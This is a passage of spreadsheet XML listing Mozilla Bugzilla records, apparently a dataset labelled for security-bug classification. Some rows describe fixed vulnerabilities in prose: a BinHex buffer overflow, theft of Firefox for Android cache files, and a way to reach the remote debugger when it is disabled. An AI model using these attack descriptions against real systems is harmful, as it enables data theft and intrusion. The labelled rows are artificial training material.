        <v>0</v>
      </c>
    </row>
    <row r="6166">
      <c r="A6166" t="n">
        <v>1423395</v>
      </c>
      <c r="B6166" t="inlineStr">
        <is>
          <t>2017-12-05 16:38:34 -0800</t>
        </is>
      </c>
      <c r="C6166" t="inlineStr">
        <is>
          <t>Sync will duplicate history visits.</t>
        </is>
      </c>
      <c r="D6166" t="inlineStr">
        <is>
          <t>2017-12-19 14:09:26 -0800</t>
        </is>
      </c>
      <c r="E6166" t="n">
        <v>1</v>
      </c>
      <c r="F6166" t="n">
        <v>1</v>
      </c>
      <c r="G6166" t="n">
        <v>2</v>
      </c>
      <c r="H6166" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6166" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6166" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K6166" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6166" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6166" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6166" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6166" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6166" t="inlineStr"/>
      <c r="Q6166" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6166" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6166" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T6166" t="n">
        <v>1</v>
      </c>
      <c r="U6166" t="n">
        <v>0</v>
      </c>
      <c r="V6166" t="n">
        <v>12</v>
      </c>
      <c r="W6166" t="inlineStr">
        <is>
          <t>We truncate the microsecond part of the `date` field before inserting (insertMany requires a Date object, which doesn't allow us to provide microseconds), but we consider it when deduping. This will lead to us roughly doubling the number of history visits D:
Patch incoming.</t>
        </is>
      </c>
      <c r="X6166" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6167">
      <c r="A6167" t="n">
        <v>527997</v>
      </c>
      <c r="B6167" t="inlineStr">
        <is>
          <t>2009-11-11 12:14:27 -0800</t>
        </is>
      </c>
      <c r="C6167" t="inlineStr">
        <is>
          <t>[dashboard][shipping] diff links in pushes view should base off of accepted signoff instead of pending</t>
        </is>
      </c>
      <c r="D6167" t="inlineStr">
        <is>
          <t>2010-05-26 08:31:47 -0700</t>
        </is>
      </c>
      <c r="E6167" t="n">
        <v>1</v>
      </c>
      <c r="F6167" t="n">
        <v>1</v>
      </c>
      <c r="G6167" t="n">
        <v>2</v>
      </c>
      <c r="H6167" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6167" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J6167" t="inlineStr">
        <is>
          <t>Infrastructure</t>
        </is>
      </c>
      <c r="K6167" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6167" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6167" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6167" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6167" t="inlineStr"/>
      <c r="Q6167" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6167" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6167" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6167" t="n">
        <v>1</v>
      </c>
      <c r="U6167" t="n">
        <v>0</v>
      </c>
      <c r="V6167" t="n">
        <v>6</v>
      </c>
      <c r="W6167" t="inlineStr">
        <is>
          <t>Right now, if there's a pending sign-off, the diff links are wrt that sign-off instead of wrt the last accepted sign-off.
That makes reviewing sign-offs hard.</t>
        </is>
      </c>
      <c r="X6167" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6168">
      <c r="A6168" t="n">
        <v>1611105</v>
      </c>
      <c r="B6168" t="inlineStr">
        <is>
          <t>2020-01-23 02:12:02 -0800</t>
        </is>
      </c>
      <c r="C6168" t="inlineStr">
        <is>
          <t>TB crashes during opening s/mime signed mail from mailman mailinglist</t>
        </is>
      </c>
      <c r="D6168" t="inlineStr">
        <is>
          <t>2020-08-08 09:41:20 -0700</t>
        </is>
      </c>
      <c r="E6168" t="n">
        <v>1</v>
      </c>
      <c r="F6168" t="n">
        <v>1</v>
      </c>
      <c r="G6168" t="n">
        <v>2</v>
      </c>
      <c r="H6168" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6168" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J6168" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6168" t="inlineStr">
        <is>
          <t>68</t>
        </is>
      </c>
      <c r="L6168" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6168" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6168" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6168" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6168" t="inlineStr"/>
      <c r="Q6168" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6168" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6168" t="inlineStr">
        <is>
          <t>Thunderbird 74.0</t>
        </is>
      </c>
      <c r="T6168" t="n">
        <v>1</v>
      </c>
      <c r="U6168" t="n">
        <v>0</v>
      </c>
      <c r="V6168" t="n">
        <v>16</v>
      </c>
      <c r="W6168" t="inlineStr">
        <is>
          <t>Created attachment 9122597
TB-Crash-Fwd_attachment_both_signed.eml
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Steps to reproduce:
Symphtom:
==========
Forward a S/MIME signed mail to a mailman mailinglist AND signe it with S/MIME again and send the forwarded mail as attachment. Now open the mail and Thunderbird crashes.
I don't know if this problem causes other security risks. Unless you have checked this I would mark this problem as harmful security problem. Feel free to "unckeck" this and open this bug for world access/read.
Affected TB versions round about above v60. TB crashes on Linux and Windows, too. Other architectures not tested.
We have tested the Horde Webgroupware and Thunderbird as sending/composing MUA but makes no different.
Fast test to reproduce:
====================
Open the attached eml file. :-/
Workarounds:
=============
1st: Do not signe the fwd mail to the list OR
2nd: Do not send the fwd mail as attachment
Actual results:
TB crashes during opening the mail.
Expected results:
TB should show/open the mail and not crash... (:</t>
        </is>
      </c>
      <c r="X6168" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6169">
      <c r="A6169" t="n">
        <v>508074</v>
      </c>
      <c r="B6169" t="inlineStr">
        <is>
          <t>2009-08-03 11:42:44 -0700</t>
        </is>
      </c>
      <c r="C6169" t="inlineStr">
        <is>
          <t>nsBinHexDecoder should use an nsCString for mName</t>
        </is>
      </c>
      <c r="D6169" t="inlineStr">
        <is>
          <t>2015-10-16 11:40:06 -0700</t>
        </is>
      </c>
      <c r="E6169" t="n">
        <v>1</v>
      </c>
      <c r="F6169" t="n">
        <v>1</v>
      </c>
      <c r="G6169" t="n">
        <v>3</v>
      </c>
      <c r="H6169" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6169" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6169" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6169" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6169" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6169" t="inlineStr">
        <is>
          <t>Maemo</t>
        </is>
      </c>
      <c r="N6169" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6169" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6169" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q6169" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6169" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6169" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6169" t="n">
        <v>1</v>
      </c>
      <c r="U6169" t="n">
        <v>0</v>
      </c>
      <c r="V6169" t="n">
        <v>16</v>
      </c>
      <c r="W6169" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/mozilla-central/source/netwerk/streamconv/converters/nsBinHexDecoder.cpp?mark=206,210,212#184
steps:
1. load http://download.adobe.com/pub/adobe/golive/mac/6.x/GL6.0.1_Mac_Client_Updater.hqx
expected results:
unclear
actual results (on arm):
double free in destructor
184 nsresult nsBinHexDecoder::ProcessNextState(nsIRequest * aRequest, nsISupports * aContext)
204       // c &amp; 63 returns the length of mName. So if we need the length, that's how
205       // you can figure it out...for now we are storing it in the first byte of mName
206       *(mName) = (c &amp; 63);     
this can set a value of up to 63
let mCount = 62
209     case BINHEX_STATE_FNAME:
210       mName[mCount] = c;
here we stomp on values. mCount == 62
212       if (mCount++ &gt; *(mName)) // the first byte of mName is the length...
if 62 &gt; 63 ... no,
mCount = 63
210       mName[mCount] = c;
here we stomp on values. mCount == 63
if 63 &gt; 63 ... no
mCount = 64
210       mName[mCount] = c;
here we stomp on values. mCount == 64
oops, our array is only 0..63
if 64 &gt; 63 ... yes
mCount = 65</t>
        </is>
      </c>
      <c r="X6169" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6170">
      <c r="A6170" t="n">
        <v>761866</v>
      </c>
      <c r="B6170" t="inlineStr">
        <is>
          <t>2012-06-05 17:38:59 -0700</t>
        </is>
      </c>
      <c r="C6170" t="inlineStr">
        <is>
          <t>[traceback] now() got an unexpected keyword argument 'utc'</t>
        </is>
      </c>
      <c r="D6170" t="inlineStr">
        <is>
          <t>2012-06-12 05:30:00 -0700</t>
        </is>
      </c>
      <c r="E6170" t="n">
        <v>1</v>
      </c>
      <c r="F6170" t="n">
        <v>1</v>
      </c>
      <c r="G6170" t="n">
        <v>5</v>
      </c>
      <c r="H6170" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6170" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J6170" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K6170" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6170" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6170" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6170" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6170" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6170" t="inlineStr">
        <is>
          <t>u=dev c=search  p=1</t>
        </is>
      </c>
      <c r="Q6170" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6170" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6170" t="inlineStr">
        <is>
          <t>2012.11</t>
        </is>
      </c>
      <c r="T6170" t="n">
        <v>1</v>
      </c>
      <c r="U6170" t="n">
        <v>0</v>
      </c>
      <c r="V6170" t="n">
        <v>6</v>
      </c>
      <c r="W6170" t="inlineStr">
        <is>
          <t>The indexing task retry code seems broken now. I suspect this is related to updating celery, but I'm not positive about that.
Task search.tasks.index_task with id 56b41166-d098-4de3-a7fa-dccb22fc23fb raised exception:
'TypeError("now() got an unexpected keyword argument \'utc\'",)'
Task was called with args: (&lt;class 'questions.models.Question'&gt;, (927362L,)) kwargs: {}.
The contents of the full traceback was:
Traceback (most recent call last):
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/execute/trace.py", line 181, in trace_task
    R = retval = fun(*args, **kwargs)
  File "/data/www/support.mozilla.com/kitsune/apps/search/tasks.py", line 87, in index_task
    countdown=RETRY_TIMES[retries])
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/app/task/__init__.py", line 548, in retry
    self.apply_async(args=args, kwargs=kwargs, **options)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/app/task/__init__.py", line 459, in apply_async
    **options)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/app/amqp.py", line 212, in delay_task
    now = now or self.app.now()
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/app/base.py", line 278, in now
    return self.loader.now(utc=self.conf.CELERY_ENABLE_UTC)
TypeError: now() got an unexpected keyword argument 'utc'
I've only seen this one error email. The retry code doesn't kick in often, so we could probably wait on this a bit. However, I think it's prudent someone at least spends the 10 minutes to look into in the near future.</t>
        </is>
      </c>
      <c r="X6170" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6171">
      <c r="A6171" t="n">
        <v>1193027</v>
      </c>
      <c r="B6171" t="inlineStr">
        <is>
          <t>2015-08-10 14:15:55 -0700</t>
        </is>
      </c>
      <c r="C6171" t="inlineStr">
        <is>
          <t>file: URIs SOP Bypass: Local private data into the local firefox folder "file:///(...)/cache/[*******].default/cache2/entries/" can be stolen using an automatic download of a html file and interact with this html file downloaded</t>
        </is>
      </c>
      <c r="D6171" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:17 -0700</t>
        </is>
      </c>
      <c r="E6171" t="n">
        <v>1</v>
      </c>
      <c r="F6171" t="n">
        <v>1</v>
      </c>
      <c r="G6171" t="n">
        <v>6</v>
      </c>
      <c r="H6171" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6171" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J6171" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6171" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L6171" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6171" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6171" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6171" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6171" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q6171" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6171" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6171" t="inlineStr">
        <is>
          <t>Firefox 43</t>
        </is>
      </c>
      <c r="T6171" t="n">
        <v>1</v>
      </c>
      <c r="U6171" t="n">
        <v>0</v>
      </c>
      <c r="V6171" t="n">
        <v>44</v>
      </c>
      <c r="W6171" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150630154324
Steps to reproduce:
With firefox for Android it's possible to download automaticly an html file with normal configuration using a PHP remote file.
When you go on the HTML file automaticly downloaded and interact with it , 
it's possible to steal private data into the local firefox folder : "file:///data/data/org.mozilla.firefox/cache/[*******].default/cache2/entries/"  which contains sensitive data like partial or full content of a website visited, 
token verification key , 
what the user has searched on google or other website (showed in the demonstration video that i will uploaded), 
and very much others private data which can lead to very confidential data stealing.
This sensitive data stealing is possible because when you download a file which is into the firefow folder : "file:///data/data/org.mozilla.firefox/cache/[*******].default/cache2/entries/" , 
it is downloaded into the download folder and canbe read by an html file and sent on a malicious website scheduled to save data sent on this website.
I have tested this vulnerability on a Samsung Galaxy S5 4g+ Lolipop Android version 5.0.2 and a Samsung Galaxy Tab A Lolipop version 5.0.2 with the last public version of Firefox for Android : Firefox 39.0
I will upload a video for show you how to interact with the testcase.
Actual results:
Very sensitive data into the local firefox folder "file:///data/data/org.mozilla.firefox/cache/[*******].default/cache2/entries/"  can be stolen leading to private data theft.
Expected results:
All files into the the local folder "file:///data/data/org.mozilla.firefox/cache/[*******].default/cache2/entries/" should not be downloaded into the download folder because this can lead to sensitive data stealing.
Vulnerability bug reported by Security researcher Jordi Chancel.</t>
        </is>
      </c>
      <c r="X6171" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6172">
      <c r="A6172" t="n">
        <v>1248804</v>
      </c>
      <c r="B6172" t="inlineStr">
        <is>
          <t>2016-02-16 15:48:40 -0800</t>
        </is>
      </c>
      <c r="C6172" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::TtfUtil::CmapSubtable4NextCodepoint]</t>
        </is>
      </c>
      <c r="D6172" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:47 -0700</t>
        </is>
      </c>
      <c r="E6172" t="n">
        <v>1</v>
      </c>
      <c r="F6172" t="n">
        <v>1</v>
      </c>
      <c r="G6172" t="n">
        <v>3</v>
      </c>
      <c r="H6172" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6172" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6172" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K6172" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6172" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6172" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6172" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6172" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6172" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q6172" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6172" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6172" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6172" t="n">
        <v>1</v>
      </c>
      <c r="U6172" t="n">
        <v>0</v>
      </c>
      <c r="V6172" t="n">
        <v>5</v>
      </c>
      <c r="W6172" t="inlineStr">
        <is>
          <t>Created attachment 8720035
call_stack.txt
This was found while fuzzing graphite2 revision a8f9210571f5339d55c7fd4524acb64ce5ca8fd8.</t>
        </is>
      </c>
      <c r="X6172" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6173">
      <c r="A6173" t="n">
        <v>757128</v>
      </c>
      <c r="B6173" t="inlineStr">
        <is>
          <t>2012-05-21 10:44:36 -0700</t>
        </is>
      </c>
      <c r="C6173" t="inlineStr">
        <is>
          <t>Remote debugging is possible even when disabled if netmonitor is enabled</t>
        </is>
      </c>
      <c r="D6173" t="inlineStr">
        <is>
          <t>2018-06-13 10:25:03 -0700</t>
        </is>
      </c>
      <c r="E6173" t="n">
        <v>1</v>
      </c>
      <c r="F6173" t="n">
        <v>1</v>
      </c>
      <c r="G6173" t="n">
        <v>3</v>
      </c>
      <c r="H6173" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6173" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J6173" t="inlineStr">
        <is>
          <t>Debugger</t>
        </is>
      </c>
      <c r="K6173" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L6173" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6173" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6173" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6173" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6173" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q6173" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6173" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6173" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6173" t="n">
        <v>1</v>
      </c>
      <c r="U6173" t="n">
        <v>0</v>
      </c>
      <c r="V6173" t="n">
        <v>17</v>
      </c>
      <c r="W6173" t="inlineStr">
        <is>
          <t>Issue:
If remote debugging is disabled, but HTTPMonitor is enabled, a remote user can connect to and use the remote debug service.
STR:
1) Enable debugging (not remote) on the target
2) enable HTTPMonitor extension on target
3) From another host, connect remote debugger to &lt;target&gt;:2929
4) enjoy your debugging session
Remediation:
It would be nice to restrict what's possible based on more than just whether or not a debugger protocol listener is listening. We can discuss some possible ways of doing this.</t>
        </is>
      </c>
      <c r="X6173" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6174">
      <c r="A6174" t="n">
        <v>1025414</v>
      </c>
      <c r="B6174" t="inlineStr">
        <is>
          <t>2014-06-13 19:34:58 -0700</t>
        </is>
      </c>
      <c r="C6174" t="inlineStr">
        <is>
          <t>wifi_start_supplicant crashes</t>
        </is>
      </c>
      <c r="D6174" t="inlineStr">
        <is>
          <t>2014-07-23 16:54:34 -0700</t>
        </is>
      </c>
      <c r="E6174" t="n">
        <v>1</v>
      </c>
      <c r="F6174" t="n">
        <v>1</v>
      </c>
      <c r="G6174" t="n">
        <v>6</v>
      </c>
      <c r="H6174" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6174" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6174" t="inlineStr">
        <is>
          <t>Vendcom</t>
        </is>
      </c>
      <c r="K6174" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6174" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6174" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6174" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6174" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6174" t="inlineStr">
        <is>
          <t>[POVB][caf priority: p1][CR 659788][b2g-crash]</t>
        </is>
      </c>
      <c r="Q6174" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6174" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6174" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6174" t="n">
        <v>1</v>
      </c>
      <c r="U6174" t="n">
        <v>0</v>
      </c>
      <c r="V6174" t="n">
        <v>20</v>
      </c>
      <c r="W6174" t="inlineStr">
        <is>
          <t>Created attachment 8440221
stack trace
Tests steps:
1. Turn on WIFI and connect to a WIFI APN.
2. Run a reboot test script, whihc will reboot the device for every 60 seconds.
3. IN between, receive MT calls.
4. After night run, minidumps are generated on the phone.</t>
        </is>
      </c>
      <c r="X6174" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6175">
      <c r="A6175" t="n">
        <v>1877879</v>
      </c>
      <c r="B6175" t="inlineStr">
        <is>
          <t>2024-01-31 17:08:40 -0800</t>
        </is>
      </c>
      <c r="C6175" t="inlineStr">
        <is>
          <t>Show alert/confirm/prompt dialog on another website with secure padlock displayed with iframe</t>
        </is>
      </c>
      <c r="D6175" t="inlineStr">
        <is>
          <t>2024-11-13 14:29:22 -0800</t>
        </is>
      </c>
      <c r="E6175" t="n">
        <v>1</v>
      </c>
      <c r="F6175" t="n">
        <v>1</v>
      </c>
      <c r="G6175" t="n">
        <v>3</v>
      </c>
      <c r="H6175" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6175" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6175" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K6175" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6175" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6175" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6175" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6175" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6175" t="inlineStr">
        <is>
          <t>[adv-main123+][adv-esr115.8+]</t>
        </is>
      </c>
      <c r="Q6175" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6175" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6175" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T6175" t="n">
        <v>1</v>
      </c>
      <c r="U6175" t="n">
        <v>0</v>
      </c>
      <c r="V6175" t="n">
        <v>25</v>
      </c>
      <c r="W6175" t="inlineStr">
        <is>
          <t>This is my second attempt at a spot fix for bug 1791283. My previous one, bug 1863852, dealt with the second test case but not the first one. In the second test case, the page with the stale alert is in the BFCache. In the first test case, I think the issue is that the window actually trying to create the alert is itself a current window global, it has a parent window that is not, so it is still not being displayed. My fix is to add a new function WindowGlobalParent::IsActiveInTab() that is like  WindowGlobalParent::IsCurrentGlobal(), but it also checks AncestorsAreCurrent to avoid this situation. It also checks the BFCache status on the top BC instead of the current BC, because Nika thought there might be issues with races (it is possible this is why my previous fix didn't work for the test case but I didn't investigate it). Hopefully this new function will do a better job at checking if a window is actually visible currently.
I wrote this based on talking with DOM: Navigation people. They said the name would more correctly be something like "isActiveInRootNavigable", but that's probably not a useful name to people writing Firefox JS code would might need this function. I did add a comment about that.</t>
        </is>
      </c>
      <c r="X6175" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6176">
      <c r="A6176" t="n">
        <v>531120</v>
      </c>
      <c r="B6176" t="inlineStr">
        <is>
          <t>2009-11-25 11:43:29 -0800</t>
        </is>
      </c>
      <c r="C6176" t="inlineStr">
        <is>
          <t>Gutter doesn't immediately appear</t>
        </is>
      </c>
      <c r="D6176" t="inlineStr">
        <is>
          <t>2010-02-20 12:50:44 -0800</t>
        </is>
      </c>
      <c r="E6176" t="n">
        <v>1</v>
      </c>
      <c r="F6176" t="n">
        <v>1</v>
      </c>
      <c r="G6176" t="n">
        <v>6</v>
      </c>
      <c r="H6176" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6176" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J6176" t="inlineStr">
        <is>
          <t>Editor</t>
        </is>
      </c>
      <c r="K6176" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6176" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6176" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6176" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6176" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6176" t="inlineStr"/>
      <c r="Q6176" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6176" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6176" t="inlineStr">
        <is>
          <t>0.5.1</t>
        </is>
      </c>
      <c r="T6176" t="n">
        <v>1</v>
      </c>
      <c r="U6176" t="n">
        <v>0</v>
      </c>
      <c r="V6176" t="n">
        <v>6</v>
      </c>
      <c r="W6176" t="inlineStr">
        <is>
          <t>Since the gutter refactoring, the gutter doesn't immediately appear in the Bespin Embedded release, only when the editor is first clicked on.</t>
        </is>
      </c>
      <c r="X6176" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6177">
      <c r="A6177" t="n">
        <v>312704</v>
      </c>
      <c r="B6177" t="inlineStr">
        <is>
          <t>2005-10-17 06:00:07 -0700</t>
        </is>
      </c>
      <c r="C6177" t="inlineStr">
        <is>
          <t>crash [@ nsNodeInfoManager::GetTextNodeInfo] on ebay page with JavaScript off</t>
        </is>
      </c>
      <c r="D6177" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6177" t="n">
        <v>1</v>
      </c>
      <c r="F6177" t="n">
        <v>1</v>
      </c>
      <c r="G6177" t="n">
        <v>3</v>
      </c>
      <c r="H6177" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6177" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6177" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6177" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6177" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6177" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6177" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6177" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6177" t="inlineStr"/>
      <c r="Q6177" t="inlineStr">
        <is>
